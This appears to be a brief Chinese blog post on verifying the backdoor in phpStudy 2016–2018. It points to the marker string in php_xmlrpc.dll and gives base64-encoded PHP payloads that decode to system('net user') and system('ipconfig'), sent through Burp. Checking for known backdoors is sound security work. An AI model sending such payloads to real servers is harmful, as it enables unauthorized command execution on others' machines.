phpstudy2016-2018漏洞验证

影响版本

漏洞验证

查看目录下 php_xmlrpc.dll

PHPTutorial\php\php-5.4.45\ext\php_xmlrpc.dll存在@eval(%s(\'%s\'));即说明有后门。

burp抓包 ctrl+R 重发

c3lzdGVtKCduZXQgdXNlcicpOw==为system(\'net user\');的base64编码转换

可以通过转码查看

c3lzdGVtKCdpcGNvbmZpZycpOw== system(ipconfig);

相关文章：

2021-10-29
2021-11-12
2021-08-19
2021-05-27
2021-11-14
2021-11-30
2018-07-16
2021-01-13

猜你喜欢

2021-04-19
2021-09-09
2021-09-14
2021-07-03
2022-02-07
2022-12-23
2021-08-03

相关资源

下载 2022-12-07
下载 2022-12-28
下载 2023-02-07

相似解决方案

热门标签

Java Python linux javascript Mysql C# Docker 算法前端 SpringBoot Redis Vue spring 设计模式 .net core .net kubernetes c++ 数据库数据结构大数据 js 机器学习微服务 Android Go 程序员面试 JVM ASP.net core 云原生人工智能后端 PHP git CSS golang k8s Nginx Django mybatis 深度学习多线程 React 架构 devops 爬虫云计算 Spring Boot LeetCode